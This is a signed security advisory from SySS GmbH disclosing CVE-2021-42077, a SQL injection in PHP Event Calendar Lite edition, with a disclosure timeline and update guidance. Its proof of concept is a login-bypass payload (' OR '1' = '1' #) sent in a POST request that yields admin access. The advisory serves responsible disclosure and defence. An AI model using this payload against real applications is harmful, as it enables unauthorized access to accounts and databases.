-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-048 Product: PHP Event Calendar Manufacturer: Kayson Group Ltd. Affected Version(s): PHP Event Calendar Lite edition Tested Version(s): PHP Event Calendar Lite edition Vulnerability Type: SQL injection (CWE-89) Risk Level: High Solution Status: Closed Manufacturer Notification: 2021-08-09 Solution Date: 2021-09-03 Public Disclosure: 2021-11-04 CVE Reference: CVE-2021-42077 Authors of Advisory: Erik Steltzner, SySS GmbH Maurizio Ruchay, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: PHP Event Calendar is a multi-user web application designed to manage and publish calendar events. The manufacturer describes the product as follows (see [1] and [2]): "PHP Event Calendar features day, week, month, year, agenda, and resource views. It includes built-in reminder support so you can deliver full-featured event scheduling management systems in the shortest possible time." "PHP Event Calendar is a out-of-box web calendar/scheduler solution. It will run on web servers that support PHP 5.3 and higher." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Due to improper validation, the application is vulnerable to SQL injection attacks. For example, the following SQL statement can be used as a username during the login process to bypass the authentication: ' OR '1' = '1' # This vulnerability cannot only be exploited to bypass the login. It can also be used to execute SQL statements directly on the database, allowing an adversary in some cases to completely compromise the database system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following request shows how it is possible for an adversary to bypass the login mask with the SQL statement "' OR '1' = '1' #": ~~~ Request: POST /server/ajax/user_manager.php HTTP/1.1 Host: [...snip...] username='+OR+'1'+%3D+'1'+%23&password=password Response: HTTP/1.1 200 OK Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx [...snip...] Connection: close success#Welcome ' OR '1' = '1' # ~~~ The web application accepts the request and the adversary is now logged in into the app with admin privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to a recent version of PHP Event Calendar. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-07-29: Vulnerability discovered 2021-08-09: Vulnerability reported to manufacturer 2021-09-03: Patch released by manufacturer 2021-11-04: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Website for PHP Event Calendar https://phpeventcalendar.com/ [2] Documentation Website for PHP Event Calendar https://phpeventcalendar.com/documentation/ [3] SySS Security Advisory SYSS-2021-048 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-048.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [5] PHP Prepared Statements: https://www.php.net/manual/de/mysqli.quickstart.prepared-statements.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Erik Steltzner and Maurizio Ruchay of SySS GmbH. E-Mail: erik.steltzner@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc Key ID: 0x4C7979CE53163268 Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268 E-Mail: maurizio.ruchay@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc Key ID: 0xC7D20E267F0FA978 Key Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE1QarWv4+Ca7/vt6yx9IOJn8PqXgFAmGDzYwACgkQx9IOJn8P qXgZ1w//csCeRXd3r1Qv4MFZzECpLFZ1enB/pnp2v5TT7w4/ZmDRLj1bncP7zOW6 Sqb4l6rPNbcr9aEWkmfRl4vIzFhwOST9iFAovV/94LqGC/93/YXGX+69ZQzUdiN0 V0D6HQF/QuQUvtviObmO8OogC/yjxBABIn3vqJLafu+XY+LnP//jiM2fdoFm/Pru 09U+6zGms/j92KI9rM0bzZU2HEAMbzz48/3h4fDC0AT8Znt0uSL0oIoO8FCte/NS SPfoVOPidKDkaieoQ0ElbdvdCvP2Mf8/mSkjhKfyyg5g/meULSBnULJdHvnsCaNq Dc7gmU1XUPXb6SdTf1k1xehg3vHixfgjNAig9Kak5RaOCboR2kBgD3aq/t7Dxudk pGk1kLkRgg1iIrF9qdH8C5GxrEWTPqgl/rg4I+ynK+vxklyl8uaesxys0O28cKHC BL4a7cERxwiMFaquQ7ZKQ9iitao58M70c+F1Ar45wY6I50JFQN9fS3FWHTMOcFML yLeOmgg6QdPdzOSo4ihL6ho0IKFFRywaAJXxU9wZ/xDFBJoEzLEYNoI527sOtuNj IUleC+kKRAwhgWocf7alsL2fQm8/74XTmXWpOQcrLxGv/GYNzMlJzzrK1Zc1yPV/ 1PTmtt/4G62iK4h24Smmv8H3tVoD1v/QHOFoJ2LYHq8+isil7HY= =K925 -----END PGP SIGNATURE-----